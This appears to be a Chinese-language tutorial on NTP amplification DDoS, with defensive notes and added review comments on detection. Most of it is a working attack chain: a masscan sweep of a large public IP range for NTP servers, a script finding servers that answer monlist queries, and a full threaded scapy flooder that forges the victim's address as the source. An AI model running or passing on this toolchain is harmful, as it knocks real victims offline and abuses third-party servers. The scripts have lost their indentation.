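NTP放大攻击是DDoS(分布式拒绝服务)攻击中的一种反射放大形式。攻击者向NTP服务器发送很小的请求,服务器返回大得多的响应;由于请求的源地址被伪造成受害者的地址,这些响应会直接发往受害者的主机。防护方面,NTP服务器应关闭monlist查询(例如在ntp.conf中使用 disable monitor 或 restrict default noquery),网络出口应做源地址校验,丢弃源地址伪造的报文。下面是Python实现脚本,脚本只供测试和学习。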

masscan是一个快速的端口扫描器

1.安装masscan

https://github.com/robertdavidgraham/masscan

2.扫描IP段端口,生成文件

# -pU:123 selects UDP port 123 (NTP), -oX writes the results to ntp.xml as XML,
# and --rate is the send rate in packets per second.
# Seen from the scanned side this is one source probing UDP/123 across
# consecutive addresses, a pattern that flow logs and IDS scan thresholds flag.
./masscan -pU:123 -oX ntp.xml --rate 160000 101.0.0.0-120.0.0.0

3.去掉重复,生成新文件

# Read the masscan XML report (ntp.xml) and append each distinct host address
# to port123.txt, one address per line.
# NOTE(review): the listing lost its indentation when it was published, so the
# nesting of the statements below has to be inferred. Python 2 syntax
# (print statement).
from lxml import etree
port = None
address = None
# Addresses already written out; used to skip duplicates.
parsedServers = []
# Opens the file used to store single entries (append mode, so a second run
# adds to whatever the file already holds).
outputFile = open('port123.txt', 'a')
# iterparse streams the report and yields the <host> elements.
for event, element in etree.iterparse('ntp.xml', tag="host"):
for child in element:
if child.tag == 'address':
address = child.attrib['addr']
if child.tag == 'ports':
for a in child:
port = a.attrib['portid']
# NOTE(review): port and address are attribute strings (or None), so this is
# not a numeric check; under Python 2 ordering it presumably only tests that
# both values were set -- confirm.
if port > 1 and address > 1:
if address not in parsedServers:
print address
outputFile.write(address + '\n')
parsedServers.append(address)
# Reset the per-host state before the next element.
port = None
address = None
# Release the parsed element.
element.clear()
outputFile.close()
print 'End'

4.完整攻击代码

from scapy.all import *
import thread
# NTP mode 7 (private) request: first byte 0x17 = version 2 / mode 7, third
# byte 0x03 = implementation, fourth byte 0x2a = request code 42 (monlist),
# followed by 61 zero bytes.
# Detection: an inbound UDP/123 datagram starting with these four bytes is a
# monlist query; a server configured with "disable monitor" or
# "restrict default noquery" does not answer it.
rawData = "\x17\x00\x03\x2a" + "\x00" * 61
# Input: the address list written by the previous step.
logfile = open('port123.txt', 'r')
# Output: addresses that answered, appended one per line.
outputFile = open('monlistServers.txt', 'a')
# Capture UDP traffic on port 48769 addressed to 99.99.99.99 and hand every
# packet to analyser(); store=0 keeps scapy from retaining the packets.
# NOTE(review): 99.99.99.99 is presumably a placeholder for the capturing
# host's own address -- confirm.
def sniffer():
sniffedPacket = sniff(filter="udp port 48769 and dst net 99.99.99.99", store=0, prn=analyser)

# Callback for sniffer(): when a captured packet is longer than 200 bytes and
# has an IP layer, print its source address and append it to
# monlistServers.txt.
# The 200-byte threshold separates large replies from small ones; a server
# that appears in this output is one whose operator still needs to turn the
# monlist query off.
def analyser(packet):
if len(packet) > 200:
if packet.haslayer(IP):
print packet.getlayer(IP).src
outputFile.write(packet.getlayer(IP).src + '\n')

# Run the capture loop in a background thread (Python 2 "thread" module).
thread.start_new_thread(sniffer, ())

# Send one request per line of port123.txt from UDP source port 48769, the
# port the capture filter above watches for replies.
for address in logfile:
send(IP(dst=address)/UDP(sport=48769, dport=123)/Raw(load=rawData))
print 'End'

https://github.com/vpnguy/ntpdos

#!/usr/bin/env python
from scapy.all import *
import sys
import threading
import time
#NTP Amp DOS attack
#by DaRkReD
#usage ntpdos.py ex: ntpdos.py 1.2.3.4 file.txt 10
#FOR USE ON YOUR OWN NETWORK ONLY

#packet sender
# Thread body: take the next entry of ntplist, build a UDP/123 packet carrying
# the request bytes in `data`, and hand it to scapy's send() with loop=1,
# which keeps re-sending the same packet.
# The IP source field is set to `target`, not to the sending host, so any
# reply goes to `target`. That forged source is what source-address validation
# (ingress/egress filtering, BCP 38) at the sender's network edge drops.
# At the receiving end the traffic appears as UDP from source port 123 to
# destination port 48947, coming from many NTP servers at once.
def deny():
#Import globals to function
global ntplist
global currentserver
global data
global target
ntpserver = ntplist[currentserver] #Get new server
currentserver = currentserver + 1 #Increment for next
packet = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data) #BUILD IT
send(packet,loop=1) #SEND IT

#So I dont have to have the same stuff twice
# Print the usage text and exit with status 0.
# NOTE(review): the "Usage ntpdos.py " line names no arguments; the
# placeholders were presumably lost when the page was rendered -- confirm
# against the linked repository.
def printhelp():
print "NTP Amplification DOS Attack"
print "By DaRkReD"
print "Usage ntpdos.py "
print "ex: ex: ntpdos.py 1.2.3.4 file.txt 10"
print "NTP serverlist file should contain one IP per line"
print "MAKE SURE YOUR THREAD COUNT IS LESS THAN OR EQUAL TO YOUR NUMBER OF SERVERS"
exit(0)

# Script body: read three command-line arguments (address, server-list file,
# thread count), load the list, and start one daemon thread per count running
# deny().
# Python 2 syntax (print statement).
if len(sys.argv) < 4:
printhelp()
#Fetch Args
target = sys.argv[1]

#Treat the common help flags as a request for the usage text
if target in ("help","-h","h","?","--h","--help","/?"):
printhelp()

ntpserverfile = sys.argv[2]
numberthreads = int(sys.argv[3])
#System for accepting bulk input
ntplist = []
currentserver = 0
with open(ntpserverfile) as f:
ntplist = f.readlines()

#Each thread consumes one list entry, so the count may not exceed the list length
if numberthreads > int(len(ntplist)):
print "Attack Aborted: More threads than servers"
print "Next time dont create more threads than servers"
exit(0)

#Magic Packet aka NTP v2 Monlist Packet
#Four header bytes (0x17 0x00 0x03 0x2a) plus four zero bytes. A UDP/123
#payload beginning with those header bytes is the monlist query to match in
#an IDS rule or to refuse on the server ("disable monitor" /
#"restrict default noquery" in ntp.conf).
data = "\x17\x00\x03\x2a" + "\x00" * 4

#Hold our threads
threads = []
print "Starting to flood: "+ target + " using NTP list: " + ntpserverfile + " With " + str(numberthreads) + " threads"
print "Use CTRL+C to stop attack"

#Thread spawner
for n in range(numberthreads):
thread = threading.Thread(target=deny)
#Daemon threads end when the main thread exits
thread.daemon = True
thread.start()

threads.append(thread)

#In progress!
print "Sending..."

#Keep alive so ctrl+c still kills all them threads
while True:
time.sleep(1)
